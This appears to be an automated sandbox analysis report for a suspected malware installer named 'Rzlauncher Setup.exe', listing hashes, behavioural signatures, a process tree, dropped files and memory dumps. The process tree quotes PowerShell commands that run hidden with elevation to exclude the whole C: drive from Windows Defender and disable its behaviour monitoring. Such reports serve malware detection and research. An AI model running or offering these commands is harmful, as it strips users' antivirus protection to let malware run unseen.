Analysis

  • max time kernel
    41s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    04-10-2024 12:57

General

  • Target

    Rzlauncher Setup.exe

  • Size

    32KB

  • MD5

    c919047959690a1646e561e81d45e5fd

  • SHA1

    5bd528b9f0ec25ea19f0d0bbba41f4422597a488

  • SHA256

    a9f0a76d6e73189b7385b6fcddeccb50e67b65c315b5c20108f86f22fce17802

  • SHA512

    dee29e35b748bb69d0acc56d744eebd50cd462a93178072f9585dadd0c12b93907d7572832733ed0ba255909ae665a8cb102a360acfe3729365ea123480c3fca

  • SSDEEP

    384:loI1gYZw33FUWUcC6TBhdsDgZH4o5NEvdlcn0ScPmPn0Avsl9EPg/s4Xsn+KvHKj:J7Zw33FNUf6Nhd/fQ1l+0vM0iT9

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Rzlauncher Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Rzlauncher Setup.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
      "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\asm-all.jar;lib\commons-email.jar;lib\cs2 skin.mp4;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zenless zero.mp4;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1320
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Add-MpPreference -Force -ExclusionPath "C:\""' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2656
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2072
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Set-MpPreference -Force -DisableBehaviorMonitoring "' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2084
      • C:\Windows\SysWOW64\explorer.exe
        explorer C:\Users\Admin\AppData\Local\Temp\YTYzMDY4OTkzNjZmOGYyZTI3ODAxZjUwMzQyNjI4ZmI.exe
        3⤵
        • System Location Discovery: System Language Discovery
        PID:300
  • C:\Windows\system32\mmc.exe
    "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
    1⤵
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:1352
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:872
    • C:\Users\Admin\AppData\Local\Temp\YTYzMDY4OTkzNjZmOGYyZTI3ODAxZjUwMzQyNjI4ZmI.exe
      "C:\Users\Admin\AppData\Local\Temp\YTYzMDY4OTkzNjZmOGYyZTI3ODAxZjUwMzQyNjI4ZmI.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2456

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\YTYzMDY4OTkzNjZmOGYyZTI3ODAxZjUwMzQyNjI4ZmI.exe

    Filesize

    226KB

    MD5

    1c83b86ee49577920f79e0175f56a480

    SHA1

    1ac4ef5a1f9ca34ac229bc26cdc914e38173c554

    SHA256

    72a88efeda156c7304c5c8bd090dcb011ba3dfbbe91f5511969ba8eecee32843

    SHA512

    d4b4ec415e92617548e863422f653b97460be182205871bf7526fe872d110e8ac17b60472d8351bed62e20ee584424816eeafcafe69ce096596ee044e1df022d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    5f4267e1746a5e33faf3b732137c7eca

    SHA1

    f3f8944a8426cec81fe3070d02b7fab67173e45c

    SHA256

    cc45cd7abf806b6adfed6e9a29c18ee8d3f6e0932ee81fafe5bcdbee3c6a76a6

    SHA512

    9628db49d5e8356d697843423e83b3a4822b28cf0efffc103642c9a961fca7f796b7939afbec3e5dfd9fced4689b36c9385d2eab93ab1c7dcf6e8d0208267b36

  • \Users\Admin\AppData\Roaming\msvcp110.dll

    Filesize

    351KB

    MD5

    a7e9d0bb0687ba84a60b387a2a6fa8d9

    SHA1

    d224cf061e302d82059ff9100f40b86b0cbbbc31

    SHA256

    7704fea9664704d6cf2aa277e30f58c71b8a5f50c957d519896450a4f81e3dbe

    SHA512

    185f52af9930a03dbccd3c160e4f6d3eedacf72999933b44c36268e45d233b617c36190c05d63211a9d0e99d448d03e5c927fcc2700d6b5244c987cfe33def88

  • memory/1320-112-0x0000000000640000-0x000000000064A000-memory.dmp

    Filesize

    40KB

  • memory/1320-60-0x0000000002A58000-0x0000000002A60000-memory.dmp

    Filesize

    32KB

  • memory/1320-30-0x00000000029A8000-0x00000000029B0000-memory.dmp

    Filesize

    32KB

  • memory/1320-29-0x0000000002A10000-0x0000000002A18000-memory.dmp

    Filesize

    32KB

  • memory/1320-28-0x00000000029B0000-0x00000000029B8000-memory.dmp

    Filesize

    32KB

  • memory/1320-27-0x0000000002A08000-0x0000000002A10000-memory.dmp

    Filesize

    32KB

  • memory/1320-34-0x0000000002A18000-0x0000000002A20000-memory.dmp

    Filesize

    32KB

  • memory/1320-36-0x0000000002A20000-0x0000000002A28000-memory.dmp

    Filesize

    32KB

  • memory/1320-38-0x0000000002A28000-0x0000000002A30000-memory.dmp

    Filesize

    32KB

  • memory/1320-40-0x0000000002A30000-0x0000000002A38000-memory.dmp

    Filesize

    32KB

  • memory/1320-41-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-43-0x0000000002A38000-0x0000000002A40000-memory.dmp

    Filesize

    32KB

  • memory/1320-46-0x0000000002A40000-0x0000000002A48000-memory.dmp

    Filesize

    32KB

  • memory/1320-45-0x0000000002970000-0x0000000002998000-memory.dmp

    Filesize

    160KB

  • memory/1320-51-0x0000000002A48000-0x0000000002A50000-memory.dmp

    Filesize

    32KB

  • memory/1320-50-0x00000000029B8000-0x00000000029C0000-memory.dmp

    Filesize

    32KB

  • memory/1320-55-0x0000000002A50000-0x0000000002A58000-memory.dmp

    Filesize

    32KB

  • memory/1320-54-0x00000000029C0000-0x00000000029C8000-memory.dmp

    Filesize

    32KB

  • memory/1320-110-0x0000000002A68000-0x0000000002A70000-memory.dmp

    Filesize

    32KB

  • memory/1320-59-0x00000000029A8000-0x00000000029B0000-memory.dmp

    Filesize

    32KB

  • memory/1320-58-0x0000000002A10000-0x0000000002A18000-memory.dmp

    Filesize

    32KB

  • memory/1320-57-0x0000000002A08000-0x0000000002A10000-memory.dmp

    Filesize

    32KB

  • memory/1320-64-0x0000000002A60000-0x0000000002A68000-memory.dmp

    Filesize

    32KB

  • memory/1320-68-0x0000000002A68000-0x0000000002A70000-memory.dmp

    Filesize

    32KB

  • memory/1320-67-0x0000000002A18000-0x0000000002A20000-memory.dmp

    Filesize

    32KB

  • memory/1320-72-0x0000000002A70000-0x0000000002A78000-memory.dmp

    Filesize

    32KB

  • memory/1320-71-0x0000000002A20000-0x0000000002A28000-memory.dmp

    Filesize

    32KB

  • memory/1320-75-0x0000000002A78000-0x0000000002A80000-memory.dmp

    Filesize

    32KB

  • memory/1320-74-0x0000000002A28000-0x0000000002A30000-memory.dmp

    Filesize

    32KB

  • memory/1320-79-0x0000000002A80000-0x0000000002A88000-memory.dmp

    Filesize

    32KB

  • memory/1320-78-0x0000000002A30000-0x0000000002A38000-memory.dmp

    Filesize

    32KB

  • memory/1320-87-0x0000000002A88000-0x0000000002A90000-memory.dmp

    Filesize

    32KB

  • memory/1320-86-0x0000000002A38000-0x0000000002A40000-memory.dmp

    Filesize

    32KB

  • memory/1320-91-0x0000000002A90000-0x0000000002A98000-memory.dmp

    Filesize

    32KB

  • memory/1320-90-0x0000000002A40000-0x0000000002A48000-memory.dmp

    Filesize

    32KB

  • memory/1320-94-0x0000000002A98000-0x0000000002AA0000-memory.dmp

    Filesize

    32KB

  • memory/1320-93-0x0000000002A48000-0x0000000002A50000-memory.dmp

    Filesize

    32KB

  • memory/1320-97-0x0000000002AA0000-0x0000000002AA8000-memory.dmp

    Filesize

    32KB

  • memory/1320-96-0x0000000002A50000-0x0000000002A58000-memory.dmp

    Filesize

    32KB

  • memory/1320-104-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-108-0x0000000000640000-0x000000000064A000-memory.dmp

    Filesize

    40KB

  • memory/1320-109-0x0000000002A60000-0x0000000002A68000-memory.dmp

    Filesize

    32KB

  • memory/1320-107-0x0000000000640000-0x000000000064A000-memory.dmp

    Filesize

    40KB

  • memory/1320-106-0x0000000002A58000-0x0000000002A60000-memory.dmp

    Filesize

    32KB

  • memory/1320-113-0x0000000002A70000-0x0000000002A78000-memory.dmp

    Filesize

    32KB

  • memory/1320-10-0x00000000029B8000-0x00000000029C0000-memory.dmp

    Filesize

    32KB

  • memory/1320-191-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-13-0x00000000029C0000-0x00000000029C8000-memory.dmp

    Filesize

    32KB

  • memory/1320-165-0x0000000000640000-0x000000000064A000-memory.dmp

    Filesize

    40KB

  • memory/1320-120-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-133-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-140-0x0000000002A78000-0x0000000002A80000-memory.dmp

    Filesize

    32KB

  • memory/1320-142-0x0000000002A80000-0x0000000002A88000-memory.dmp

    Filesize

    32KB

  • memory/1320-161-0x0000000002A88000-0x0000000002A90000-memory.dmp

    Filesize

    32KB

  • memory/1320-162-0x0000000002A90000-0x0000000002A98000-memory.dmp

    Filesize

    32KB

  • memory/1320-163-0x0000000002A98000-0x0000000002AA0000-memory.dmp

    Filesize

    32KB

  • memory/1320-164-0x0000000002AA0000-0x0000000002AA8000-memory.dmp

    Filesize

    32KB

  • memory/1320-116-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-166-0x0000000000640000-0x000000000064A000-memory.dmp

    Filesize

    40KB

  • memory/1320-188-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-111-0x0000000000640000-0x000000000064A000-memory.dmp

    Filesize

    40KB

  • memory/1320-195-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-203-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-224-0x0000000002A08000-0x0000000002A10000-memory.dmp

    Filesize

    32KB

  • memory/1320-225-0x0000000002A10000-0x0000000002A18000-memory.dmp

    Filesize

    32KB

  • memory/1320-226-0x00000000029A8000-0x00000000029B0000-memory.dmp

    Filesize

    32KB

  • memory/1320-227-0x0000000002A18000-0x0000000002A20000-memory.dmp

    Filesize

    32KB

  • memory/1320-6-0x0000000002970000-0x0000000002998000-memory.dmp

    Filesize

    160KB

  • memory/1320-214-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-220-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-221-0x0000000000470000-0x0000000000471000-memory.dmp

    Filesize

    4KB

  • memory/1320-222-0x00000000029B8000-0x00000000029C0000-memory.dmp

    Filesize

    32KB

  • memory/1320-223-0x00000000029C0000-0x00000000029C8000-memory.dmp

    Filesize

    32KB

  • memory/1320-239-0x0000000002A78000-0x0000000002A80000-memory.dmp

    Filesize

    32KB

  • memory/1320-244-0x0000000002AA0000-0x0000000002AA8000-memory.dmp

    Filesize

    32KB

  • memory/1320-243-0x0000000002A98000-0x0000000002AA0000-memory.dmp

    Filesize

    32KB

  • memory/1320-242-0x0000000002A90000-0x0000000002A98000-memory.dmp

    Filesize

    32KB

  • memory/1320-241-0x0000000002A88000-0x0000000002A90000-memory.dmp

    Filesize

    32KB

  • memory/1320-240-0x0000000002A80000-0x0000000002A88000-memory.dmp

    Filesize

    32KB

  • memory/1320-238-0x0000000002A70000-0x0000000002A78000-memory.dmp

    Filesize

    32KB

  • memory/1320-237-0x0000000002A68000-0x0000000002A70000-memory.dmp

    Filesize

    32KB

  • memory/1320-236-0x0000000002A60000-0x0000000002A68000-memory.dmp

    Filesize

    32KB

  • memory/1320-235-0x0000000002A58000-0x0000000002A60000-memory.dmp

    Filesize

    32KB

  • memory/1320-234-0x0000000002A50000-0x0000000002A58000-memory.dmp

    Filesize

    32KB

  • memory/1320-233-0x0000000002A48000-0x0000000002A50000-memory.dmp

    Filesize

    32KB

  • memory/1320-232-0x0000000002A40000-0x0000000002A48000-memory.dmp

    Filesize

    32KB

  • memory/1320-231-0x0000000002A38000-0x0000000002A40000-memory.dmp

    Filesize

    32KB

  • memory/1320-230-0x0000000002A30000-0x0000000002A38000-memory.dmp

    Filesize

    32KB

  • memory/1320-229-0x0000000002A28000-0x0000000002A30000-memory.dmp

    Filesize

    32KB

  • memory/1320-228-0x0000000002A20000-0x0000000002A28000-memory.dmp

    Filesize

    32KB

  • memory/1352-168-0x000000001D7F0000-0x000000001DB36000-memory.dmp

    Filesize

    3.3MB

  • memory/1352-167-0x0000000002280000-0x000000000229E000-memory.dmp

    Filesize

    120KB

  • memory/2456-207-0x0000000000310000-0x0000000000316000-memory.dmp

    Filesize

    24KB

  • memory/2456-206-0x0000000000B20000-0x0000000000B60000-memory.dmp

    Filesize

    256KB

  • memory/2520-0-0x0000000000400000-0x0000000000415000-memory.dmp

    Filesize

    84KB